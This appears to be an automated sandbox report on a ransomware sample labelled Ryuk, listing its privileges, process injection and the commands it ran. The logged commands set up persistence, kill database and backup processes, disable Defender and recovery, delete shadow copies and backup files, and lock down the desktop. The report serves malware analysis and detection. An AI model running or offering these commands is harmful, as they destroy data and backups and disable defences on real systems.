Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4040 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1900 wrote to memory of 4368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4040 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1592 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4040 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4152 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4040 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 5088 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4040 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4020 wrote to memory of 212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4040 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 208 wrote to memory of 3776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4040 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4040 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4588 wrote to memory of 1344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 4992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3780 wrote to memory of 4872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3780 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4040 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1344 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4872 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4040 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1448 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe

"C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\system32\net.exe

net stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\system32\sc.exe

sc config SQLWriter start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\system32\sc.exe

sc config SstpSvc start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

